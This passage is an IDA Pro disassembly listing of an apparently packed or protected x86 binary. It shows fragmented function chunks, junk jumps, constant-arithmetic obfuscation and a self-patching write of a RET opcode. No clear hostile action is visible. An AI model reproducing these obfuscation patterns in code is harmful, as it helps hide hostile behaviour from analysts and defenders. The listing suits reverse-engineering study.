loc_454A73:				; CODE XREF: sub_44C4BC:loc_44D735j
		or	edi, 0A86A2732h
		add	edi, 11D9F5FAh

loc_454A7F:				; CODE XREF: sub_453867-155A0j
		xchg	edi, [esp-0Ch+arg_8]
		jmp	loc_44D272
; END OF FUNCTION CHUNK	FOR sub_450203
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_322. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_454A88:				; CODE XREF: sub_453867+3A88j
		jmp	loc_44A933
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_454A8D:				; CODE XREF: sub_4578A6-E94Bj
		jmp	nullsub_222
; END OF FUNCTION CHUNK	FOR sub_4578A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_454A92:				; CODE XREF: sub_440337:loc_43FA64j
					; y2kk37jd:0043FA7Cj
		add	edx, 1CAA600Ch
		xor	edx, 2FF9B01Ah
		call	sub_440CD1
		push	eax
		ror	eax, 18h
		mov	ds:dword_447338, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451722

loc_454AAE:				; CODE XREF: sub_451722+7j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_451722
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450394

loc_454AB3:				; CODE XREF: sub_450394+Ej
		jmp	loc_4479DE
; END OF FUNCTION CHUNK	FOR sub_450394
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452995

loc_454AB8:				; CODE XREF: sub_452995+2j
		rol	eax, 18h
		jmp	sub_44C5FE
; END OF FUNCTION CHUNK	FOR sub_452995
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_176. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B42

loc_454AC1:				; CODE XREF: sub_452B42+18j
		jmp	loc_448EF7
; END OF FUNCTION CHUNK	FOR sub_452B42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0AD

loc_454AC6:				; CODE XREF: sub_44D0AD+9j
		jmp	sub_44F086
; END OF FUNCTION CHUNK	FOR sub_44D0AD
; ---------------------------------------------------------------------------

loc_454ACB:				; CODE XREF: y2kk37jd:00458F14j
		jb	nullsub_46
; START	OF FUNCTION CHUNK FOR sub_4410D8

loc_454AD1:				; CODE XREF: sub_4410D8:loc_458EF6j
		add	esi, 0EC423039h
		xchg	esi, [esp+4+var_4]
		jmp	sub_45C4C8
; END OF FUNCTION CHUNK	FOR sub_4410D8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_37. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_454AE0:				; CODE XREF: y2kk37jd:0044C72Aj
		jmp	loc_441A41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DD9

loc_454AE5:				; CODE XREF: sub_458DD9:loc_45A1C9j
		push	0ECBED09Dh
		not	eax
		jmp	loc_4530A5
; END OF FUNCTION CHUNK	FOR sub_458DD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458681

loc_454AF1:				; CODE XREF: sub_458681:loc_458DFDj
					; y2kk37jd:00458E11j
		add	eax, 8972042h
		rol	eax, 16h
		add	eax, 0AF03DD78h
		xchg	eax, [esp+0Ch+var_C]
		jmp	sub_457026
; END OF FUNCTION CHUNK	FOR sub_458681
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD3D

loc_454B08:				; CODE XREF: sub_43BD3D:loc_458230j
		add	edx, 723FF0DFh
		xchg	edx, [esp-4+arg_0]
		jmp	sub_441718
; END OF FUNCTION CHUNK	FOR sub_43BD3D

; =============== S U B	R O U T	I N E =======================================



sub_454B16	proc near		; CODE XREF: y2kk37jd:0043FEF4j
					; y2kk37jd:00443B18p

; FUNCTION CHUNK AT 004429F7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044B342 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044CDB3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454C6E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459776 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045C35E SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		or	edx, edx
		jnz	loc_443431
		jmp	loc_45C35E
sub_454B16	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_454B27:				; CODE XREF: y2kk37jd:004422BDj
		jz	loc_45916F

; =============== S U B	R O U T	I N E =======================================



sub_454B2D	proc near		; CODE XREF: sub_45A089:loc_4593ADp

; FUNCTION CHUNK AT 0044235C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00455B2E SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	91537982h
		pop	ecx
		jmp	loc_44235C
sub_454B2D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_454B3C:				; CODE XREF: y2kk37jd:0044220Fj
		rol	ecx, 6

; =============== S U B	R O U T	I N E =======================================



sub_454B3F	proc near		; CODE XREF: sub_43DE8B+D16p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044261D SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0045B56F SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	eax
		push	edi
		push	7B57DF91h
		pop	edi
		jmp	loc_44261D
sub_454B3F	endp

; ---------------------------------------------------------------------------

locret_454B50:				; CODE XREF: y2kk37jd:0045528Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_454B51:				; CODE XREF: sub_43B0F5+11001j
		jmp	loc_44C111
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------

loc_454B56:				; CODE XREF: y2kk37jd:0044AF9Aj
		jmp	loc_44EA82
; ---------------------------------------------------------------------------

loc_454B5B:				; CODE XREF: y2kk37jd:004466D0j
		jmp	loc_44C18D
; ---------------------------------------------------------------------------

loc_454B60:				; CODE XREF: y2kk37jd:00441B54j
		jmp	loc_44738F
; ---------------------------------------------------------------------------
		mov	ds:off_41E040, eax
		lea	eax, loc_450A68
		mov	byte ptr [eax],	0C3h
		jmp	loc_450A68

; =============== S U B	R O U T	I N E =======================================



sub_454B79	proc near		; CODE XREF: sub_41A889+1Ep
					; sub_454B79+5j
					; DATA XREF: ...
		call	sub_454B84
		jmp	ds:off_41E044
sub_454B79	endp


; =============== S U B	R O U T	I N E =======================================



sub_454B84	proc near		; CODE XREF: sub_442F2A+3j
					; y2kk37jd:loc_44A553j	...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044C453 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044CA65 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045679B SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00456F33 SIZE 0000001C BYTES

		jnz	loc_44C453
		xchg	ebp, [esp+0]
		jmp	loc_44CA65
sub_454B84	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_20. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45593D

loc_454B93:				; CODE XREF: sub_45593D+6j
		jmp	loc_43BCCF
; END OF FUNCTION CHUNK	FOR sub_45593D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_197. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_454B99:				; CODE XREF: y2kk37jd:0044D453j
		jmp	loc_44644C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_21. PRESS	KEYPAD "+" TO EXPAND]
		db 31h
		dd 0E8000001h, 0FFFFF86Bh, 0FF86D5E9h, 0B94FE9FFh
		db 0FEh, 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_454BB2:				; CODE XREF: sub_4507BF:loc_4542F8j
		jz	loc_43C96A
		jmp	loc_44024B
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_454BBD:				; DATA XREF: sub_443688+1067Bo
		pop	eax
		cmp	dword ptr [eax], 0
		push	offset loc_442BD0
		jmp	loc_43C553
; ---------------------------------------------------------------------------

loc_454BCB:				; CODE XREF: y2kk37jd:004592E7j
		mov	[edx], edi
		popf
		xchg	ecx, [ebx]

loc_454BD0:				; CODE XREF: y2kk37jd:00453A42j
		add	ebx, 41F3E43Eh
		xchg	ebx, [esp]
		jmp	loc_446A47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_454BDE:				; CODE XREF: sub_443BAF-39E4j
		and	eax, ebx

loc_454BE0:				; CODE XREF: sub_443BAF:loc_4401B4j
		and	edx, 58415E30h
		add	edx, 0E8437161h
		push	offset sub_4581E3
		jmp	sub_454273
; END OF FUNCTION CHUNK	FOR sub_443BAF

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_454BF6	proc near		; CODE XREF: sub_4408B9+168B1j
		retn
sub_454BF6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4415B8

loc_454BF7:				; CODE XREF: sub_4415B8+15535j
		jmp	sub_43BA66
; END OF FUNCTION CHUNK	FOR sub_4415B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D20F

loc_454BFC:				; CODE XREF: sub_43D20F+13j
		jmp	loc_446C6B
; END OF FUNCTION CHUNK	FOR sub_43D20F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_454C01:				; CODE XREF: sub_43F911+132B9j
		pop	ecx
		add	ecx, 0A1AEB95Eh
		cmp	ecx, 8EE8DA71h
		jmp	loc_457221
; END OF FUNCTION CHUNK	FOR sub_43F911
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_85. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B95

loc_454C14:				; CODE XREF: sub_453B95+Dj
		jmp	sub_45405E
; END OF FUNCTION CHUNK	FOR sub_453B95
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_454C19:				; CODE XREF: sub_4577FE:loc_453784j
		jz	loc_44F566
		jmp	loc_43E628
; END OF FUNCTION CHUNK	FOR sub_4577FE

; =============== S U B	R O U T	I N E =======================================



sub_454C24	proc near		; DATA XREF: sub_453583+2041o

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CEBB SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0043DE24 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E638 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F505 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441423 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00441F82 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00444701 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444E32 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004456CD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004478A6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00447D6F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044A5DE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B1A5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044D7BF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E71D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045373B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453EF3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045434B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004545D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457641 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004586E4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045A12C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045B0E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B59C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045C119 SIZE 00000010 BYTES

		mov	edi, ebx
		pop	ebx
		mov	eax, [ebp-4]
		mov	al, [eax]
		jno	loc_44E71D
		sub	al, 99h
		mov	edx, [ebp-4]
		jmp	loc_4545D2
sub_454C24	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	edx, edi
		jmp	sub_44F68D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B86B

loc_454C43:				; CODE XREF: sub_44B86B-EA9Dj
					; y2kk37jd:004506AFj
		add	edi, 0BF40D318h
		push	offset sub_443695
		jmp	loc_4431FF
; END OF FUNCTION CHUNK	FOR sub_44B86B
; ---------------------------------------------------------------------------
		test	edx, ebx
		jmp	loc_44DE99
; ---------------------------------------------------------------------------

loc_454C5A:				; DATA XREF: sub_445226+F7o
		mov	edx, [ebp-4]
		push	offset loc_455113
		jmp	loc_43EA6B
; ---------------------------------------------------------------------------

loc_454C67:				; DATA XREF: y2kk37jd:loc_4594E8o
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_454C69:				; CODE XREF: y2kk37jd:00458308j
		jmp	locret_45A762
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B16

loc_454C6E:				; CODE XREF: sub_454B16-12115j
		jmp	loc_44B342
; END OF FUNCTION CHUNK	FOR sub_454B16

; =============== S U B	R O U T	I N E =======================================



sub_454C73	proc near		; CODE XREF: y2kk37jd:loc_43C9D7p
					; y2kk37jd:loc_446AECp
		push	large dword ptr	fs:0
		mov	large fs:0, esp
		call	sub_459789
sub_454C73	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_454C86:				; CODE XREF: sub_4408B9+10B57j
		jmp	loc_44A593
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------

loc_454C8B:				; CODE XREF: y2kk37jd:00449380j
		jmp	loc_448ABC
; ---------------------------------------------------------------------------
		push	offset sub_448F55
		jmp	loc_455A2E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_454C9A:				; CODE XREF: sub_445568-74CEj
		jnp	loc_4418CE

loc_454CA0:				; CODE XREF: sub_445568:loc_4525CBj
		add	eax, edx
		xor	eax, ebx
		add	eax, ecx
		jmp	loc_44C201
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444180

loc_454CAB:				; CODE XREF: sub_444180:loc_4430B5j
		shr	edx, 3

loc_454CAE:				; CODE XREF: y2kk37jd:00444B4Aj
		push	72AF45A2h
		pop	ecx
		xor	ecx, 0C0EB21B8h
		or	ecx, 0AD9503FAh
		add	ecx, 61AFE050h
		jmp	loc_4419D4
; END OF FUNCTION CHUNK	FOR sub_444180
; ---------------------------------------------------------------------------
		push	8EE605Ah
		pop	edx
		xor	edx, ds:4000F1h
		add	edx, 262A6123h
		jmp	loc_44326D
; ---------------------------------------------------------------------------
		sub	ecx, esi
		jmp	sub_45B4CB
; ---------------------------------------------------------------------------

loc_454CE9:				; CODE XREF: y2kk37jd:loc_44361Cj
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44223F
		jmp	loc_45B94D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_454CF7:				; CODE XREF: sub_44AC89-81C7j
		test	eax, 1

loc_454CFD:				; CODE XREF: sub_43F8B8:loc_4439ACj
		jmp	loc_43D90C
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443525

loc_454D02:				; CODE XREF: sub_443525:loc_44CDC4j
		pop	esi
		xchg	esi, [esp-8+arg_0]
		mov	ebp, esi
		pop	esi
		retn
; END OF FUNCTION CHUNK	FOR sub_443525
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DF8A

loc_454D0A:				; CODE XREF: sub_43DF8A+Aj
		jmp	loc_43E36E
; END OF FUNCTION CHUNK	FOR sub_43DF8A

; =============== S U B	R O U T	I N E =======================================



sub_454D0F	proc near		; CODE XREF: y2kk37jd:0043B82Ep
					; sub_43F285:loc_43C34Bj ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043BC90 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043DB16 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043DF07 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E509 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044035E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004430B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004442D0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00445818 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00445830 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00446B16 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00446F8A SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044A54E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DCB6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045351A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004550AB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00456B1E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004572DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459639 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045BFB5 SIZE 00000015 BYTES

		push	esi
		jmp	loc_45BFB5
sub_454D0F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_454D15:				; CODE XREF: y2kk37jd:loc_455E7Aj
		add	eax, 0FD71C5FCh
		xchg	eax, [esp]
		jmp	sub_45405E
; ---------------------------------------------------------------------------

loc_454D23:				; DATA XREF: y2kk37jd:004581F4o
		mov	eax, 1
		push	offset loc_45461D
		jmp	locret_43C50C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA5B

loc_454D32:				; CODE XREF: sub_43CA5B+1j
		mov	edi, ebp
		xchg	edi, [esp+8+var_8]
		mov	ebp, esp
		push	ebp
		push	ecx
		pop	ebp
		xchg	ebp, [esp+0Ch+var_C]
		jmp	loc_43F2C8
; END OF FUNCTION CHUNK	FOR sub_43CA5B
; ---------------------------------------------------------------------------
		test	ebx, esi
		jmp	loc_45673C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_101. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_454D4C:				; CODE XREF: y2kk37jd:loc_43BC54j
					; sub_44113A+1A20Aj
		jmp	loc_459B64
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E1E9

loc_454D51:				; CODE XREF: sub_43E1E9+1B4C5j
		jmp	loc_44D180
; END OF FUNCTION CHUNK	FOR sub_43E1E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_454D56:				; CODE XREF: sub_445226+3C20j
		jmp	nullsub_154
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_454D5B:				; CODE XREF: sub_45B7AA:loc_43D943j
		mov	edx, ecx
		xchg	edx, [esp+4+var_4]
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_445844
		or	eax, eax
		jnz	loc_440965
		jmp	loc_44EAF9
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A3F8

loc_454D76:				; CODE XREF: sub_44A3F8:loc_44A2BAj
		mov	ebx, edx
		pop	edx

loc_454D79:				; CODE XREF: sub_44E840-65B7j
					; sub_451515:loc_45B898j
		pop	ebp
		jmp	sub_44E5E5
; END OF FUNCTION CHUNK	FOR sub_44A3F8
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp]
		jmp	loc_455BC5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CBDE

loc_454D8D:				; CODE XREF: sub_43CBDE:loc_43CF27j
		pushf
		jno	loc_455CC9
		add	edi, 0B2DA538Dh
		jmp	loc_455A15
; END OF FUNCTION CHUNK	FOR sub_43CBDE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458CE4

loc_454D9F:				; CODE XREF: y2kk37jd:0043FD39j
					; sub_458CE4:loc_44328Aj ...
		add	ebx, 5E9A082h
		xchg	ebx, [esp+0]
		jmp	loc_44B365
; END OF FUNCTION CHUNK	FOR sub_458CE4

; =============== S U B	R O U T	I N E =======================================



sub_454DAD	proc near		; CODE XREF: y2kk37jd:0043FCC9j
					; sub_447832+9p
		xchg	eax, [esp+0]
		pop	eax
		push	ecx
		push	offset sub_4536F2
		jmp	nullsub_156
sub_454DAD	endp

; ---------------------------------------------------------------------------

loc_454DBC:				; CODE XREF: y2kk37jd:loc_44C60Aj
		test	eax, 8000000h
		jmp	loc_44DCBB
; ---------------------------------------------------------------------------

loc_454DC7:				; CODE XREF: y2kk37jd:00459DCEj
		xor	edx, esi

; =============== S U B	R O U T	I N E =======================================



sub_454DC9	proc near		; CODE XREF: sub_452ABB+Ap

arg_4		= dword	ptr  8

		xchg	edx, [esp+0]
		pop	edx
		popf
		xchg	edx, [esp-8+arg_4]
		jmp	sub_440337
sub_454DC9	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_428. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_454DD7:				; CODE XREF: sub_43ED19+1176Bj
		jmp	sub_447832
; END OF FUNCTION CHUNK	FOR sub_43ED19

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_454DDC	proc near		; CODE XREF: y2kk37jd:00458624p

; FUNCTION CHUNK AT 00441DE0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448C6B SIZE 00000002 BYTES

		push	ebp
		mov	ebp, esp
		call	sub_453315

loc_454DE4:				; CODE XREF: y2kk37jd:0045AD4Dj
		jmp	loc_441DE0
sub_454DDC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456742

loc_454DE9:				; CODE XREF: sub_456742+Aj
		jmp	nullsub_487
; END OF FUNCTION CHUNK	FOR sub_456742
; ---------------------------------------------------------------------------
		pushf
		jmp	sub_4589B7
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_446DF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D522

loc_454DFA:				; CODE XREF: sub_43D522:loc_44AB26j
		push	offset sub_455DDE
		jmp	nullsub_157
; END OF FUNCTION CHUNK	FOR sub_43D522
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441718

loc_454E04:				; CODE XREF: sub_441718+1j
		mov	ebp, esp
		push	offset sub_43EA3B
		jmp	loc_4542F3
; END OF FUNCTION CHUNK	FOR sub_441718
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_454E10:				; CODE XREF: sub_43B8D6:loc_457D55j
		xchg	edi, ebx

loc_454E12:				; CODE XREF: sub_440040:loc_457D42j
		add	esi, 0BBCAB778h
		xchg	esi, [esp-8+arg_4]
		jmp	loc_45554C
; END OF FUNCTION CHUNK	FOR sub_43B8D6

; =============== S U B	R O U T	I N E =======================================



sub_454E20	proc near		; CODE XREF: y2kk37jd:0043DA0Dj
					; y2kk37jd:0044EC9Ep

; FUNCTION CHUNK AT 0043F44B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00440116 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00440605 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440FB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441D0A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004448D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004475AE SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004488B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CA7C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004535DC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455413 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045823F SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		cmp	dword ptr [ebp-4], 0
		jz	loc_455413
		jmp	loc_45823F
sub_454E20	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE26

loc_454E33:				; CODE XREF: sub_43FE26:loc_45A9D3j
					; y2kk37jd:0045A9E9j
		add	eax, 0F43FBA56h
		xchg	eax, [esp+0]
		jmp	nullsub_457
; END OF FUNCTION CHUNK	FOR sub_43FE26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_454E41:				; CODE XREF: sub_43C46D:loc_43D662j
		jnz	loc_43E514
		jmp	loc_441218
; END OF FUNCTION CHUNK	FOR sub_43C46D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E83

loc_454E4C:				; CODE XREF: sub_444E83:loc_45A236j
		jz	loc_44591B
		jmp	loc_4459FB
; END OF FUNCTION CHUNK	FOR sub_444E83
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_40. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_454E58:				; CODE XREF: y2kk37jd:0044D9DEj
		jmp	loc_45030D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_454E5D:				; CODE XREF: sub_4411C3+2F04j
		sbb	ecx, eax
		or	esi, 0D4F3137Dh
		test	edx, 62AEB6B8h
		jmp	loc_45951C
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_454E70:				; CODE XREF: sub_4458DD+C2CAj
		or	edi, 176974D0h
		sub	edi, 76FBBF63h
		test	edi, 2000000h
		jmp	loc_44794C
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_454E87:				; CODE XREF: sub_4553C1:loc_459393j
		jnz	loc_44601A
		jmp	loc_4535C9
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------
		call	sub_45405E
		mov	edx, 0F25CB94Fh
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_454E9C:				; CODE XREF: sub_43F2F2:loc_43CAA5j
		call	sub_440CD1
		call	sub_45405E
		mov	edx, 92B16BD7h
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+4+var_4]
		jmp	loc_43CB20
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442376

loc_454EB6:				; CODE XREF: sub_442376+D3ADj
		mov	eax, 0FD5070BAh
		jb	loc_456A28

loc_454EC1:				; CODE XREF: sub_442376:loc_43F0BCj
		call	sub_4577FE
		test	al, al
		jz	loc_459030
		jmp	loc_45786E
; END OF FUNCTION CHUNK	FOR sub_442376
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44931C

loc_454ED3:				; CODE XREF: sub_44931C-4784j
		sub	ebp, 0D395A612h
; END OF FUNCTION CHUNK	FOR sub_44931C

; =============== S U B	R O U T	I N E =======================================



sub_454ED9	proc near		; CODE XREF: sub_44931C:loc_445D7Bj

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00444128 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004596C4 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, ebx
		xchg	ebp, [esp+4+var_4]
		push	7E5F1D06h
		pop	ebx
		sub	ebx, 0B8DE5318h
		jmp	loc_444128
sub_454ED9	endp

; ---------------------------------------------------------------------------

loc_454EF0:				; CODE XREF: y2kk37jd:0043FD3Fj
		shr	ebx, 1Bh
		pop	ebp
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_454EF4:				; CODE XREF: sub_4448E2:loc_43FD2Ej
		add	esi, 2515BCE1h
		xchg	esi, [esp+4+var_4]
		jmp	loc_4462BD
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		ror	ecx, 1Ch
		jmp	loc_451480
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_454F0A:				; CODE XREF: sub_448700-9F5Ej
		jge	loc_44A090
		jnb	loc_44D596

loc_454F16:				; CODE XREF: y2kk37jd:0043D3F8j
		shr	eax, 0Bh
		jmp	loc_43B6FD
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
		dw 860Fh
		dd 0FFFF3DF9h, 259C8A0Fh, 0F9E90000h
